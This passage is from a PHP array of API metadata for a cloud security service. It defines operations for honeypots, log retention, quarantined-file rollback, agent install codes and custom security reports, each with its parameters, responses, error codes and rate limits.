'*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F156EA41-8EEF-54B2-908B-EAE071XXXXXX\\"\\n}","type":"json"}]', ], 'RemoveCheckResultWhiteList' => [ 'summary' => 'Removes the check items of the configuration assessment feature from the whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119348', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckGroupId', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Deprecated', 'title' => ''], ], [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the check items.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '11', 'title' => ''], 'required' => false, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Deprecated', 'title' => ''], ], [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The ID of the whitelist rule.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to query the IDs of whitelist rules.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '22', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'A set of cloud product instance IDs that require validation.', 'type' => 'array', 'items' => ['description' => 'Cloud product instance ID of the check item.', 'type' => 'string', 'required' => false, 'example' => 'i-uf6j8vq9l4r5ntht****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'RemoveCheckResultWhiteListResponse'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '98C82076-E0D5-51DA-99F2-513F4XXXXXX', 'title' => ''], 'Code' => ['description' => 'The HTTP status code. The status code 200 indicates that the request was successful.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"98C82076-E0D5-51DA-99F2-513F4XXXXXX\\",\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"Success\\": true\\n}","type":"json"}]', 'title' => 'RemoveCheckResultWhiteList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RemoveCheckResultWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:RemoveCheckResultWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ResetHoneypot' => [ 'summary' => 'Resets a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'HoneypotId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot.'."\n" ."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to query the IDs of honeypots.'."\n", 'type' => 'string', 'required' => true, 'example' => '945607c2ae2a1a737c04599d6608065688bfc6048d9b9d306ce8dc8191c*****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about the honeypot.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotId' => ['title' => '', 'description' => 'The ID of the honeypot.'."\n", 'type' => 'string', 'example' => '9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****'], 'HoneypotName' => ['title' => '', 'description' => 'The custom name of the honeypot.'."\n", 'type' => 'string', 'example' => 'ruoyi'], 'ControlNodeName' => ['title' => '', 'description' => 'The name of the management node to which the honeypot belongs.'."\n", 'type' => 'string', 'example' => 'managerNodename'], 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the image that is used for the honeypot.'."\n", 'type' => 'string', 'example' => 'ruoyi'], 'PresetId' => ['title' => '', 'description' => 'The ID of the custom configuration for the honeypot.'."\n", 'type' => 'string', 'example' => '868a7579-00b5-4a74-999d-8bd3f411****'], 'State' => [ 'title' => '', 'description' => 'The statuses of the honeypots.'."\n", 'type' => 'array', 'items' => ['description' => 'The status of the honeypot. Valid values:'."\n" ."\n" .'* **starting**: enabling'."\n" .'* **running**: normal'."\n" .'* **exited**: disabled'."\n" .'* **upgrade**: updating'."\n" .'* **deleting**: deleting'."\n" .'* **resetting**: resetting'."\n" .'* **created**: created'."\n" .'* **stopping**: stopping'."\n", 'type' => 'string', 'example' => 'running', 'title' => ''], 'example' => '', ], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the image.'."\n", 'type' => 'string', 'example' => 'RuoYi'], 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A57C711B-AA15-55B2-8F61-4D09CEXXXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"HoneypotId\\": \\"9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****\\",\\n \\"HoneypotName\\": \\"ruoyi\\",\\n \\"ControlNodeName\\": \\"managerNodename\\",\\n \\"HoneypotImageName\\": \\"ruoyi\\",\\n \\"PresetId\\": \\"868a7579-00b5-4a74-999d-8bd3f411****\\",\\n \\"State\\": [\\n \\"running\\"\\n ],\\n \\"HoneypotImageDisplayName\\": \\"RuoYi\\",\\n \\"NodeId\\": \\"a882e590-b87b-45a6-87b9-d0a3e5a0****\\"\\n },\\n \\"RequestId\\": \\"A57C711B-AA15-55B2-8F61-4D09CEXXXXX\\"\\n}","type":"json"}]', 'title' => 'ResetHoneypot', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ResetHoneypot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ResetLogShipper' => [ 'summary' => 'Resets and upgrades the log analysis feature. You can call this operation only when the log analysis feature uses the pay-as-you-go billing method.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '138847', 'abilityTreeNodes' => ['FEATUREsasA2G5MU'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Ttl', 'in' => 'query', 'schema' => ['description' => 'The global log retention period.'."\n" ."\n" .'> This parameter is supported only when the log analysis feature uses the pay-as-you-go billing method.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '180', 'title' => ''], ], [ 'name' => 'HotTtl', 'in' => 'query', 'schema' => ['description' => 'The global retention period of hot data.'."\n" ."\n" .'> The value of this parameter must be at least 7 and smaller than the log retention period. Unit: days.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], ], [ 'name' => 'LogMetaList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The settings of the log analysis feature.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The setting of the log analysis feature.'."\n", 'type' => 'object', 'properties' => [ 'ConfigLogStore' => ['description' => 'The Logstore that you want to configure.'."\n" ."\n" .'> You can call the [DescribeLogMeta](~~DescribeLogMeta~~) operation to query the Logstore.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas-security-log', 'title' => ''], 'Status' => ['description' => 'The status of the log analysis feature. Valid values:'."\n" ."\n" .'* **disabled**'."\n" .'* **enabled**'."\n", 'type' => 'string', 'required' => false, 'example' => 'enabled', 'title' => ''], 'Ttl' => ['description' => 'The log retention period of the Logstore.'."\n" ."\n" .'> If you specify this parameter for the Logstore, the global log retention period specified by the Ttl parameter is overwritten.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '60', 'title' => ''], 'HotTtl' => ['description' => 'The retention period of hot data in the Logstore.'."\n" ."\n" .'> The value of this parameter must be at least 7 and smaller than the log retention period. Unit: days. If you specify this parameter for the Logstore, the global retention period of hot data specified by the HotTtl parameter is overwritten.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D2E31293-DAAC-574B-B816-A18EA0A6****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalHotTTL', 'errorMessage' => 'The hot storage TTL is invalid.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D2E31293-DAAC-574B-B816-A18EA0A6****\\"\\n}","type":"json"}]', 'title' => 'ResetLogShipper', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ResetLogShipper'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ResetLogShipper', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'RetryAgentlessTask' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The task ID. Call [ListAgentlessTask](~~ListAgentlessTask~~) to obtain the task ID.', 'type' => 'string', 'required' => false, 'example' => '5347c7b6-c85c-4070-846a-3029e08e****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retry an agentless detection task', 'summary' => 'Retries an agentless detection task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RetryAgentlessTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:RetryAgentlessTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\"\\n}","type":"json"}]', ], 'RetryInstallProbe' => [ 'summary' => 'Retry installing the honeypot probe.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '133459', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], ], 'parameters' => [ [ 'name' => 'ProbeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe ID.'."\n" ."\n" .'> You can call the [ListHoneypotProbe](~~ListHoneypotProbe~~) operation to query the IDs of probes.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c4c47cc1-f60a-4b2f-bcdb-9aed6644****'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A4247271-7C31-5A54-9EA1-658D96ED****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AgentNotOnline', 'errorMessage' => 'The agent not online.', 'description' => ''], ['errorCode' => 'MachineNotExist', 'errorMessage' => 'The machine does not exist.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A4247271-7C31-5A54-9EA1-658D96ED****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'RetryInstallProbe', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RetryInstallProbe'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:RetryInstallProbe', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'RollbackSuspEventQuaraFile' => [ 'summary' => 'Restores a quarantined file.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92431', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. '."\r\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'QuaraFileId', 'in' => 'query', 'schema' => ['description' => 'The ID of the quarantined file. '."\n" .'> If you do not configure this parameter, you cannot call the RollbackSuspEventQuaraFile operation to restore a quarantined file. You can call the [DescribeSuspEventQuaraFiles](~~DescribeSuspEventQuaraFiles~~) operation to query the IDs of quarantined files.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3921797', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The ID of the request source. Set the value to sas. '."\r\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. '."\r\n", 'type' => 'string', 'example' => '52A3AEE6-114A-499D-8990-4BA9B27FE0AA', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"52A3AEE6-114A-499D-8990-4BA9B27FE0AA\\"\\n}","type":"json"}]', 'title' => 'RollbackSuspEventQuaraFile', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RollbackSuspEventQuaraFile'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:RollbackSuspEventQuaraFile', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SasInstallCode' => [ 'summary' => 'Queries the installation verification code that is used to run the installation command of the Security Center agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92432', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '120.41.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'data' => ['description' => 'The installation verification code that is used to run the installation command when you manually install the Security Center agent.'."\n", 'type' => 'string', 'example' => 'eD****', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'B256A525-7E42-4BB9-A27C-9017FDDF****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"data\\": \\"eD****\\",\\n \\"RequestId\\": \\"B256A525-7E42-4BB9-A27C-9017FDDF****\\"\\n}","type":"json"}]', 'title' => 'SasInstallCode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SasInstallCode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:SasInstallCode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SaveCustomizeReportConfig' => [ 'summary' => 'Saves the configurations of a custom security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92433', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], ], 'parameters' => [ [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the report.'."\n" ."\n" .'> You can call the [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'ReportType', 'in' => 'query', 'schema' => ['description' => 'The type of the report. Valid values:'."\n" ."\n" .'* **0**: daily report.'."\n" .'* **1**: weekly report.'."\n" .'* **2**: monthly report.'."\n" .'* **3**: report whose statistics are collected within a custom time range.'."\n" .'* **4**: report of the most recent time range.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '4', 'title' => ''], ], [ 'name' => 'Title', 'in' => 'query', 'schema' => ['description' => 'The title of the report.'."\n", 'type' => 'string', 'required' => true, 'example' => 'Daily Report', 'title' => ''], ], [ 'name' => 'ReportSendType', 'in' => 'query', 'schema' => ['description' => 'The time range in which the report is sent. Valid values:'."\n" ."\n" .'* **1**: 00:00 to 06:00.'."\n" .'* **2**: 06:00 to 12:00.'."\n" .'* **3**: 12:00 to 18:00.'."\n" .'* **4**: 18:00 to 24:00.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'ReportStartDate', 'in' => 'query', 'schema' => ['description' => 'The start date on which the report is sent. The value is in the yyyy-MM-dd format.'."\n" ."\n" .'> This parameter is required if the ReportType parameter is set to 3.'."\n", 'type' => 'string', 'required' => false, 'example' => '2024-01-01', 'title' => ''], ], [ 'name' => 'ReportEndDate', 'in' => 'query', 'schema' => ['description' => 'The end date on which the report is sent. The value is in the yyyy-MM-dd format.'."\n" ."\n" .'> This parameter is required if the ReportType parameter is set to 3.'."\n", 'type' => 'string', 'required' => false, 'example' => '2024-01-15', 'title' => ''], ], [ 'name' => 'Recipients', 'in' => 'query', 'schema' => ['description' => 'The email address of the recipient. Separate multiple email addresses with commas (,).'."\n", 'type' => 'string', 'required' => true, 'example' => 'xxx@163.com', 'title' => ''], ], [ 'name' => 'ReportStatus', 'in' => 'query', 'schema' => ['description' => 'The status of the report. Valid values:'."\n" ."\n" .'* **0**: disabled.'."\n" .'* **1**: enabled.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'ReportLang', 'in' => 'query', 'schema' => ['description' => 'The language of the report. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'SendEndTime', 'in' => 'query', 'schema' => ['description' => 'The end time at which the report is sent. The value is in the HH:mm:ss format.'."\n" ."\n" .'> This parameter is required if the ReportType parameter is set to 0, 1, 2, or 4.'."\n", 'type' => 'string', 'required' => false, 'example' => '10:00:00', 'title' => ''], ], [ 'name' => 'SendStartTime', 'in' => 'query', 'schema' => ['description' => 'The start time at which the report is sent. The value is in the HH:mm:ss format.'."\n" ."\n" .'> This parameter is required if the ReportType parameter is set to 0, 1, 2, or 4.'."\n", 'type' => 'string', 'required' => false, 'example' => '09:00:00', 'title' => ''], ], [ 'name' => 'PinnedTime', 'in' => 'query', 'schema' => ['description' => 'The time when the report is pinned. Unit: milliseconds.'."\n" ."\n" .'> This parameter is supported only in version 2.0.0.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1717430400000', 'title' => ''], ], [ 'name' => 'ReportDays', 'in' => 'query', 'schema' => ['description' => 'The most recent days for report statistics.'."\n" ."\n" .'> This parameter is supported only in version 2.0.0.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], ], [ 'name' => 'SendPeriodType', 'in' => 'query', 'schema' => ['description' => 'The interval at which the report is sent. Valid values:'."\n" ."\n" .'* **DAY**'."\n" .'* **WEEK**'."\n" .'* **MONTH**'."\n" ."\n" .'> This parameter is supported only in version 2.0.0.'."\n", 'type' => 'string', 'required' => false, 'example' => 'MONTH', 'title' => ''], ], [ 'name' => 'SendPeriodDays', 'in' => 'query', 'schema' => ['description' => 'The exact day within the sending period.'."\n" ."\n" .'> This parameter is supported only in version 2.0.0.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '12', 'title' => ''], ], [ 'name' => 'TargetUids', 'in' => 'query', 'schema' => ['description' => 'The ID of the Alibaba Cloud account. Separate multiple IDs with commas (,).'."\n" ."\n" .'> This parameter is supported only in version 2.0.0.'."\n", 'type' => 'string', 'required' => false, 'example' => '12,123', 'title' => ''], ], [ 'name' => 'GroupType', 'in' => 'query', 'schema' => ['description' => 'The grouping type. Valid values:'."\n" ."\n" .'* **ALIYUN_RG**'."\n" .'* **SAS_GROUP**'."\n" ."\n" .'> This parameter is supported only in version 2.0.0.'."\n", 'type' => 'string', 'required' => false, 'example' => 'SAS_GROUP', 'title' => ''], ], [ 'name' => 'TargetGroups', 'in' => 'query', 'schema' => ['description' => 'The groups.'."\n" ."\n" .'> This parameter is supported only in version 2.0.0.'."\n", 'type' => 'string', 'required' => false, 'example' => '12,123', 'title' => ''], ], [ 'name' => 'ReportVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the report. Valid values:'."\n" ."\n" .'* **1.0.0**'."\n" .'* **2.0.0**'."\n", 'type' => 'string', 'required' => false, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'MemberAccountSyncFlag', 'in' => 'query', 'schema' => ['description' => 'Whether the new account is connected by default. Values: '."\n" .'- **true**: Yes. '."\n" .'- **false**: No. '."\n" .'> Only supported in version 2.0.0.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'ReportId' => ['description' => 'The ID of the report.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '11472B29-1A1C-5D7F-944B-7CD84319****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ReportId\\": 123,\\n \\"RequestId\\": \\"11472B29-1A1C-5D7F-944B-7CD84319****\\"\\n}","type":"json"}]', 'title' => 'SaveCustomizeReportConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveCustomizeReportConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:SaveCustomizeReportConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SaveImageBaselineStrategy' => [ 'summary' => 'Creates or updates an image baseline strategy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92434', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'BaselineItemList', 'in' => 'query', 'schema' => ['description' => 'The baseline items.'."\n" ."\n" .'> You can call the [DescribeImageBaselineStrategy](~~DescribeImageBaselineStrategy~~) API to obtain the value of this parameter.', 'type' => 'string', 'required' => true, 'example' => 'ak_leak', 'title' => ''], ], [ 